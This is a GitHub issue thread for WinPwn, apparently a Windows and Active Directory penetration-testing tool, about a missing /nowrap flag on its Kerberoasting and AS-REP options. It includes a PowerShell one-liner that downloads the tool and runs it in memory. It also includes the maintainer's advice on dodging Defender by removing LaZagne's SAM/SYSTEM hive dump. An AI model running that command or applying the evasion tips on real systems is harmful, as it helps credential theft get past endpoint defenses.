S3cur3Th1sSh1t / WinPwn

Automation for internal Windows Penetrationtest / AD-Security
BSD 3-Clause "New" or "Revised" License

/nowrap nomore! #17

Closed sp00ks-git closed 3 years ago

sp00ks-git commented 3 years ago

Could you re-add /nowrap to the ASREP and Kerberoasting options please! Seems to have gone on at least the offline version.

I find the offline version very useful and use it more often as limited access to the internet is a usual position I'm in.

Thanks!

S3cur3Th1sSh1t commented 3 years ago

Whoops, I'll add it again. Domainpasswordspray is also broken atm. Gonna do that tomorrow 👌

S3cur3Th1sSh1t commented 3 years ago

Give e9db01a3f0b8479570e076140d2ac1134766bfde a try and tell me if it's fixed. LaZagne is also replaced, but its signature won't last long, as always with public tools. It's better to build your own customized version.

sp00ks-git commented 3 years ago

Thanks man.

sp00ks-git commented 3 years ago

Just tested on a Win10 box and it's detected immediately by Defender. See screenshot attached. Interesting that it's more about behaviour than the file itself. This is a similar message I'm getting for my custom mimikatz file. Maybe they have updated Defender to look more at behaviour.

S3cur3Th1sSh1t commented 3 years ago

One of the first things LaZagne does with the "all" parameter is dumping the SAM and SYSTEM hives from the registry to get the SAM database credentials. Maybe that is detected; I found many AV/EDR vendors looking for that behaviour in the past. The only method to avoid the detection is to remove the SAM/SYSTEM dump from LaZagne and use, for example, InternalMonologue for the hashes instead. But I'll leave that up to you ;-)

sp00ks-git commented 3 years ago

Thanks for the support, all good now. Can confirm that /nowrap is sorted also.

sp00ks-git commented 3 years ago

Yo! Just rechecked option 8 from the menu for Kerberoasting and the output loses the /nowrap again, can you update?

For clarity: I downloaded WinPwn in memory using:

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')

Selected option: 8
Viewed output: "Kerberoasting_Rubeus.txt"

S3cur3Th1sSh1t commented 3 years ago

Fixed with 3ab6c6c0fcc91f8f98ed2df1de17c7a0592342fb. Only fixed it for the Offline version last time.